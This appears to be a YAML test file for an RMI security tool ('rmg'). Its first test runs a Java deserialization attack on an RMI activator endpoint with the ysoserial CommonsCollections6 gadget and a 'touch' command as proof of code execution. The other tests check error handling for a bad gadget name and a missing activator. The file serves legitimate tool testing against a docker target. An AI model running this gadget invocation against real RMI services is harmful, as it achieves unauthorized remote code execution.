tester:
  title: Activator Tests
  description: |-
    'Performs tests for the serial action on an RMI activator endpoint.'

  id: '001-001'
  groups:
    - act
    - serial
  id_pattern: '001-001-{:03}'


variables:
  file: jdk8-activator-rce-test.txt


tests:
  - title: Gadget Call
    description: |-
      'Performs a deserialization attack on the activator endpoint.'
      'The expected result is a file being created within the docker'
      'volume.'

    groups:
      - ysoserial

    command:
      - rmg
      - serial
      - ${TARGET}
      - CommonsCollections6
      - 'touch ${volume-d}/${file}'
      - --component
      - act
      - ${OPTIONS}

    validators:
      - error: False
      - regex:
          match:
            - 'Deserialization attack.+successful'
      - file_exists:
          cleanup: True
          files:
            - '${volume}/${file}'


  - title: Invalid Gadget
    description: |-
      'Check whether an incorrect gadget specification is handeled'
      'correctly and a corresponding error message is displayed.'

    groups:
      - ysoserial

    command:
      - rmg
      - serial
      - ${TARGET}
      - CommonsCollections1337
      - invalid
      - --component
      - act
      - ${OPTIONS}

    validators:
      - error: True
      - contains:
          ignore_case: True
          values:
            - wrong gadget name
            - invalid gadget argument


  - title: No Activator
    description: |-
      'Check whether a non present activator is handeled'
      'correctly and a corresponding error message is displayed.'

    groups:
      - ysoserial

    command:
      - rmg
      - serial
      - ${TARGET-SSL}
      - CommonsCollections6
      - ls
      - --component
      - act
      - ${OPTIONS}

    validators:
      - error: False
      - contains:
          ignore_case: True
          values:
            - Caught NoSuchObjectException
            - no activator
